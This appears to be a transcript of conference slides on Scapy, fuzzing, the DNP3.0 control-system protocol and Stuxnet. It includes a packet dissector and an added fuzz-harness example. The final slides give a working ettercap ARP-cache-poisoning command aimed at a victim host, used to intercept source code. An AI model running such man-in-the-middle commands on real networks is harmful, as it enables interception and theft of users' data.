Fuzzing (Ashigirl96, from ZareGoto)
Self-Introduction
Handle name: Ashigirl96. On Twitter. Interests: network / control system security, Python, Scapy.
Scapy is...
Fuzzing is...
Cars... ( ਊ ) 中二病君 (image slide)
Factories... ( ਊ ) 中二病君 (image slide)
"Riajuu" (people with fulfilling offline lives)... ( ਊ ) 中二病君 (image slide)
Scapy
http://www.secdev.org/projects/scapy/
"Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc."
...in Python
---- from kotobank.jp
IEC62443
IEC62443 (control system security standard)! WIB (International Instrument Users' Association)! ISCI (ISA Security Compliance Institute): EDSA
EDSA
EDSA consists of a Software Development Security Assessment (SDSA), a Functional Security Assessment (FSA) and Communication Robustness Testing (CRT), certified at Level 1, Level 2 or Level 3.
Fuzzing
Fuzzing (fuzz)
Fuzz -> victim
For example: an HTTP request with the Host header repeated over and over
  GET / HTTP/1.1
  Host: www.hoge.jp
  Host: www.hoge.jp
  Host: www.hoge.jp
  Host: www.hoge.jp
  Host: www.hoge.jp
  ---> Web server (足軽画伯)
DNP3.0
DNP3.0 (Distributed Network Protocol): the protocol spoken between the HMI/SCADA master and the RTUs.
DNP3.0 layers:
  Application Layer
  Transport Function
  Data Link Layer
Each field is described with Scapy field classes.
Scapy Reference
Part ① and ② of my own ("oreore") code:

```python
# Presenter's DNP3.0 request dissector for Scapy, reassembled from the two
# slides; the import, the bit widths and the closing brackets were missing.
from scapy.all import Packet, BitField, ByteEnumField

# DNP3.0 application-layer function codes (request direction).
FunctionCode = {
    0: "Confirm",
    1: "Read",
    2: "Write",
    3: "Select",
    4: "Operate",
    5: "Dir operate",
    6: "Dir operate No resp",
    7: "Freeze",
    8: "Freeze No resp",
    9: "Freeze clear",
    10: "Freeze clear No resp",
    11: "Freeze at time",
    12: "Freeze at time No resp",
    13: "Cold restart",
    14: "Warm restart",
    15: "Initialize data",
    16: "Initialize application",
    17: "Start application",
    18: "Stop application",
    19: "Save configuration",
    20: "Enable unsolicited",
    21: "Disable unsolicited",
    22: "Assign class",
    23: "Delay measurement",
    24: "Record current time",
    25: "Open file",
    26: "Close file",
    27: "Delete file",
    28: "Get file information",
    29: "Authenticate file",
    30: "Abort file",
}

class DNP3QR(Packet):
    name = "DNP3.0 request"
    fields_desc = [
        # Application Header
        # Application Control octet: FIR | FIN | CON | UNS | SEQ (4 bits).
        # The four one-bit flags come first so that the five fields pack
        # into exactly one byte.
        BitField('fir', 0, 1),
        BitField('fin', 0, 1),
        BitField('con', 0, 1),
        BitField('uns', 0, 1),
        BitField('seq', 0, 4),
        # Function Code: a single octet, looked up in FunctionCode
        ByteEnumField("type", 1, FunctionCode),
    ]
```
DNP3.0: off by one
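The following is an added example, not the presenter's code: a pure-Python dissector for the two-byte DNP3.0 application header built from the function-code table on the slides, plus a small mutation-fuzz harness that shows how fuzzing surfaces an off-by-one in the table lookup. It needs no Scapy; the deliberately buggy lookup, the boundary corpus and the sample frames are constructed for this demo.

```python
"""DNP3.0 application-header parser and a minimal fuzz harness (added example)."""
import random

# Function-code table from the slides: list index == DNP3 function code (0..30).
FUNCTION_NAMES = [
    "Confirm", "Read", "Write", "Select", "Operate", "Dir operate",
    "Dir operate No resp", "Freeze", "Freeze No resp", "Freeze clear",
    "Freeze clear No resp", "Freeze at time", "Freeze at time No resp",
    "Cold restart", "Warm restart", "Initialize data", "Initialize application",
    "Start application", "Stop application", "Save configuration",
    "Enable unsolicited", "Disable unsolicited", "Assign class",
    "Delay measurement", "Record current time", "Open file", "Close file",
    "Delete file", "Get file information", "Authenticate file", "Abort file",
]


def lookup_fixed(fc: int) -> str:
    """Bounds-checked lookup: any code outside 0..30 is reported as Unknown."""
    if fc >= len(FUNCTION_NAMES):
        return "Unknown"
    return FUNCTION_NAMES[fc]


def lookup_off_by_one(fc: int) -> str:
    """Constructed buggy lookup: '>' instead of '>=' lets fc == 31 through
    and indexes one element past the end of the table."""
    if fc > len(FUNCTION_NAMES):
        return "Unknown"
    return FUNCTION_NAMES[fc]


def parse_app_header(data: bytes, lookup=lookup_fixed) -> dict:
    """Dissect the DNP3 application header: control octet
    (FIR FIN CON UNS SEQ[4]) followed by the function-code octet."""
    if len(data) < 2:
        raise ValueError("application header needs 2 bytes, got %d" % len(data))
    ctrl, fc = data[0], data[1]
    return {
        "fir": (ctrl >> 7) & 1,
        "fin": (ctrl >> 6) & 1,
        "con": (ctrl >> 5) & 1,
        "uns": (ctrl >> 4) & 1,
        "seq": ctrl & 0x0F,
        "function_code": fc,
        "function_name": lookup(fc),
    }


def fuzz_app_header(lookup, iterations=500, seed=0):
    """Feed boundary values plus random mutations to the parser and collect
    every input that raises anything other than the expected ValueError."""
    rng = random.Random(seed)
    # Boundary corpus first: table edges and byte extremes are where
    # off-by-one bugs live. 0xC0 = FIR and FIN set, SEQ 0.
    corpus = [bytes([0xC0, fc]) for fc in (0, 30, 31, 32, 255)]
    corpus += [b"", b"\xC0"]                      # truncated headers
    for _ in range(iterations):
        frame = bytes([rng.randrange(256), rng.randrange(256)])
        if rng.random() < 0.1:
            frame = frame[: rng.randrange(2)]     # truncation mutation
        corpus.append(frame)
    findings = []
    for frame in corpus:
        try:
            parse_app_header(frame, lookup)
        except ValueError:
            continue                              # explicit rejection is fine
        except Exception as exc:                  # anything else is a finding
            findings.append((frame, type(exc).__name__))
    return findings


if __name__ == "__main__":
    # Constructed sample frame: FIR=1 FIN=1 SEQ=3, function code 1 (Read).
    print(parse_app_header(bytes([0xC3, 0x01])))
    print("buggy lookup findings:", fuzz_app_header(lookup_off_by_one)[:3])
    print("fixed lookup findings:", fuzz_app_header(lookup_fixed))
```

The harness treats a ValueError as the parser's own rejection of a short frame and anything else as a crash worth reporting; with the buggy lookup the boundary frame carrying function code 31 raises IndexError, with the fixed lookup nothing is reported.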
Stuxnet
How it spreads:
1. USB
2.
3. C&C over port 80 (HTTP)
4.
5.
Function of Stuxnet
1. 500 KB, 4000
2. /
3.
4. 2 rootkits
5. Windows with WinCC/Step7
Stuxnet
9 Windows
How to
How to avoid each individual attack technique
References (Scapy): http://fossies.org/dox/scapy-2.2.0/ , http://www.secdev.org/projects/scapy/doc/build_dissect.html , http://www.secdev.org/projects/scapy/doc/advanced_usage.html
References (DNP3.0): http://www.dnp.org/default.aspx , http://www.softech.co.jp/mm_120404_firm.htm , http://www05.abb.com/global/scot/scot229.nsf/veritydisplay/65b4a3780db3b3f3c2256e68003dffe6/$file/rec523_dnpprotmanend.pdf
References (Fuzzing): http://www.ipa.go.jp/security/vuln/fuzzing.html , http://lifeofpentester.blogspot.jp/2013/10/fuzz-testing-web-applications-with-burp.html
Scapy...!!
1. ARP-cache-poison with ettercap. 2. Parse the packets ettercap captured with Scapy. 3. Fiddle with the parsed data in Python and pull out the source code. 4. Send it to a certain site. 5. It is accepted as the correct answer.
ettercap + Scapy
Diagram: 192.168.1.4 (Mac) sends source code to a certain site; 192.168.1.17 (Backtrack5) ARP-cache-poisons the Mac, BT5 grabs the source code (?), and then parses it...
Ettercap: a LAN sniffing / man-in-the-middle tool
http://sourceforge.jp/projects/sfnet_ettercap/
%ettercap -T -M arp -i eth1 /192.168.1.4/ /192.168.1.1/ -w 01.pcap
  -T                        use text-only CUI
  -M METHOD:ARGS            perform a mitm attack; in this case, ARP cache poisoning
  -i, --iface               use this network interface; in this case, 'eth1'
  /192.168.1.4/ /192.168.1.1/   the two target hosts; 192.168.1.4 is the victim
  -w, --write               write sniffed data to a pcap file